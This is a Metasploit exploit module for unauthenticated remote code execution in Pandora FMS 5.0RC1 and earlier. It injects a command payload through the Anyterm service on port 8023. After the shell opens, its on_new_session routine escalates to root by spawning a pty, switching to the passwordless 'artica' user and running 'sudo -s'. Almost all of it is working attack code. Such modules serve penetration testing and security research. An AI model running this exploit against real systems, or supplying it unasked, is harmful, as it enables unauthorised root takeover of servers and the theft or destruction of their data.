Pandora FMS Remote Code Execution

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::EXE

def initialize(info={})

super(update_info(info,

'Name' => "Pandora FMS Remote Code Execution",

'Description' => %q{

This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.

It will leverage an unauthenticated command injection in the Anyterm service on

port 8023. Commands are executed as the user "pandora". In Pandora FMS 4.1 and 5.0RC1

the user "artica" is not assigned a password by default, which makes it possible to su

to this user from the "pandora" user. The "artica" user has access to sudo without a

password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0

and lower force a password for the "artica" user during installation.

},

'License' => MSF_LICENSE,

'Author' =>

[

'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module

],

'References' =>

[

],

'Payload' =>

{

'BadChars' => "",

'Compat' =>

{

'PayloadType' => 'cmd',

'RequiredCmd' => 'generic perl python',

}

},

'Platform' => ['unix'],

'Arch' => ARCH_CMD,

'Targets' =>

[

['Pandora 5.0RC1', {}]

],

'Privileged' => true,

'DisclosureDate' => "Jan 29 2014",

'DefaultTarget' => 0))

register_options(

[

Opt::RPORT(8023),

OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']),

], self.class)

end

def on_new_session(client)

print_status("#{peer} - Trying to escalate privileges to root")

[

# ignore SIGHUP so the server doesn't kill our root shell

"trap '' HUP",

# Spawn a pty for su/sudo

"python -c 'import pty;pty.spawn(\"/bin/sh\")'",

# Su to the passwordless "artica" account

"su - artica",

# The "artica" use has sudo rights without the need for a

# password, thus gain root priveleges

"sudo -s",

].each do |command|

vprint_status(command)

client.shell_write(command + "\n")

end

super

end

def check

# Check version

print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway")

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, "anyterm.html")

})

if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway")

print_good("#{peer} - Pandora FMS Remote Gateway Detected!")

return Exploit::CheckCode::Detected

end

return Exploit::CheckCode::Safe

end

def exploit

print_status("#{peer} - Sending payload")

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(target_uri.path, "/anyterm-module"),

'vars_post' => {

'a' => "open",

'p' => "`#{payload.encoded}`"

}

})

if !res || res.code != 200

fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")

end